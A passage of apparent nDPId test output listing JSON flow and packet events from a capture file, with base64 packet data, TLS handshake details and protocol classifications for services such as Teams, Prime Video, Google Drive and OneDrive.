{"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","server_names":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"104071bf77c5f0d7bae5f17542ba9428","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft 
Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=teams.office.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"27:20:65:85:4C:34:BF:09:F0:25:56:B8:50:A7:4D:38:8C:45:82:80"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495669804,"flow_last_seen":1646495669804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495669804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1646495669804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495669804,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8GxZAAEAGN4nAqAGAbIq5aoOAAbvmWe+jAAAAAKAC+vCvxQAAAgQFtAQCCAqEU9WfAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1646495669812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495669812,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8yYIAAPcGEhxsirlqwKgBgAG7g4CERzW35lnvpKAS\/\/\/nPAAAAgQFoAQCCArIqUDThFPVnwEDAwg="} 
-01164{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1646495669817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495669817,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5GxhAAEAGNYrAqAGAbIq5aoOAAbvmWe+khEc1uIAYAfZdLwAAAQEICoRT1avIqUDTFgMBAgABAAH8AwN96ffJWUDTazcjPKRqPmlOCDA7EP6e0q+5Knlqzgn4siDXwLeA2RnsV46x7ZH7OaLw+Chjc3EP4ZBJc+xWJC0l1wAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAXABUAABJ3d3cucHJpbWV2aWRlby5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgGExhTuOW51jqeKeMnZIkirN5TNVDUu2atdTJKyWyDBgAFwBBBNa6zHPDKyGGZ8TLrmG8xe75hAb+vBq5zYOy2EFwzMFPukEZchYJ5onOljVZmDEEihxmPvbweI2eyfjNpyF4jCAAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495669804,"flow_last_seen":1646495669817,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495669817,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":473,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495669824,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495697787,"flow_last_seen":1646495697787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495697787,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1646495697787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495697787,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TvVAAEAG4RXAqAGAjvq5jtyKAbuisGnHAAAAAKAC+vDU+wAAAgQFtAQCCAq56si5AAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1646495697803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495697803,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8kPwAAHIGrI6O+rmOwKgBgAG73IpV9E4KorBpyKAS\/\/903wAAAgQFlgQCCAoX\/J8euerIuQEDAwg="} -01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1646495697805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495697805,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5TvdAAEAG3xbAqAGAjvq5jtyKAbuisGnIVfROC4AYAfb\/+QAAAQEICrnqyMsX\/J8eFgMBAgABAAH8AwMm2R5Ju93q7BO1hUBCbI67+PD2u7\/isSvjCgLKpqok\/yCAWXfAe1hCLkH2e7v9afeyqpqQSwrsncirtbeBJ9H19AAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABBkcml2ZS5nb29nbGUuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIN3ozE7d4X5ID5WvLeFvcVfA+y6MygI54w6MzPaYwOcyABcAQQTFpbayzL1z3QPN8cTTIDg5o4CXfe8\/xuT5UCf9QOlCuSljPogKq5ahl7f7neEgUhdrgF5Z8PWW8a+71cG5NS4HACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495697787,"flow_last_seen":1646495697805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495697805,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":477,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495697827,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495710343,"flow_last_seen":1646495710343,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495710343,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1646495710343,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495710343,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8tchAAEAGPx\/AqAGADVF2W4FOAbtTwyfkAAAAAKAC+vBryAAAAgQFtAQCCAom4HXhAAAAAAEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1646495710376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495710376,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0mxFAAG4GK94NUXZbwKgBgAG7gU7a1m2vU8Mn5YAS\/\/\/iBwAAAgQFoAEDAwgBAQQC"} 
-01150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1646495710381,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495710381,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAIttcpAAEAGPSzAqAGADVF2W4FOAbtTwyfl2tZtsFAYAfZlCgAAFgMBAgABAAH8AwMcPgJU1zrnl+hPKuEgTOmCA8DSxG0x4ZP+nrnS1ukwmSB2tLYK4RsCmYHQ+tv7RzCytXVHC3ipih0buXJEGgMzzAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAxvbmVkcml2ZS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgkhEItWzjEiug\/WBaiPCJVLwOMCFSobcq6gZ3ZM5d7hUAFwBBBKUDUTjCPdZ8Ll1S+z857hqnZsJZ3Vatea3adXIfU3XxBdTrso0nY7PLm8teDMagz\/bdRE3yXoqXxIphrdW4ROsAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710343,"flow_last_seen":1646495710381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710381,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"onedrive.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01315{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":484,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646495710343,"flow_last_seen":1646495710415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6356,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1646495710415,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"67bfe5d15ae567fb35fd7837f0116eec","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"50:2F:33:10:92:AC:27:7B:17:BE:82:68:3B:E2:29:AD:97:41:B7:BB"}} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495710534,"flow_last_seen":1646495710534,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495710534,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1646495710534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495710534,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8CqVAAEAGNnfAqAGADWsqDd4EAbvOscftAAAAAKAC+vD21AAAAgQFtAQCCArXIg8YAAAAAAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1646495710555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495710555,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0VKNAAHUGt4ANayoNwKgBgAG73gT+RZAmzrHH7oAS\/\/9wpwAAAgQFoAEDAwgBAQQC"} 
-01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1646495710557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495710557,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItCqdAAEAGNITAqAGADWsqDd4EAbvOscfu\/kWQJ1AYAfaM8QAAFgMBAgABAAH8AwNoOd\/HU8dseMv53a0gjDg57feHmv3ZKYt3PSUCEOAz7yDC+9qh9Lsnn2pjQO0NmdEK9+51DwzlDpkQTXJ0hGSXhgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFvbmVkcml2ZS5saXZlLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAI7FYCMeLngdMxbkPLy3IoQelSFCsyCvetq1oFf6z+UQAXAEEEWlI8xcTn+Mao6N7i2Le6X1KJI9pYZKIE\/2dqJMzsIrHC0C7HZlpYDP5BCM3Qrb983QL8azL17uscE+MtJARpvAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710534,"flow_last_seen":1646495710557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710557,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":494,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646495710534,"flow_last_seen":1646495710577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":795,"midstream":0,"thread_ts_msec":1646495710577,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.live.com","server_names":"onedrive.com,p.sfx.ms,*.live.com,*.live.net,*.skydrive.live.com,*.onedrive.live.com,*.onedrive.com,d.sfx-df.ms,*.odwebb.svc.ms,*.odwebp.svc.ms,*.odwebdf.svc.ms,*.odwebpl.svc.ms","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02","subjectDN":"CN=onedrive.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"77:7F:F2:95:29:A7:E3:CC:0F:BF:2F:BA:2E:6F:2A:38:62:8B:48:4D"}} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495749875,"flow_last_seen":1646495749875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495749875,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1646495749875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495749875,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8bgJAAEAGHN3AqAGAgeJr0q\/WAbvpKcA1AAAAAKAC+vDq5gAAAgQFtAQCCAoyACVaAAAAAAEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1646495750196,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495750196,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAAC8Gm+eB4mvSwKgBgAG7r9bNFCqu6SnANoASOQgzewAAAgQFoAEBBAIBAwMH"} 
-01153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1646495750202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495750202,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItbgRAAEAGGurAqAGAgeJr0q\/WAbvpKcA2zRQqr1AYAfYZ+QAAFgMBAgABAAH8AwMSMXO4WcNq177CYxST5Cayi57AGXeQdEMNPed0f\/vO+CBsnRDIIeROJeOlCByvk7lr9pRUbeR06Cs4dVzQT0oYEAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA13d3cuaWZsaXguY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIOmUL4m7jSQuaHGCv6++\/yOU0VJCaPyexIMcIsguXG5nABcAQQTHBHql0\/iCD7AqH7jE0qyA2MF\/+\/iD9HNmfv2msqiXNFGoZilNx52dlYpSngcjMahYCZatuJxecuXUWxhAYPfzACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495749875,"flow_last_seen":1646495750202,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495750202,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"},"tls": 
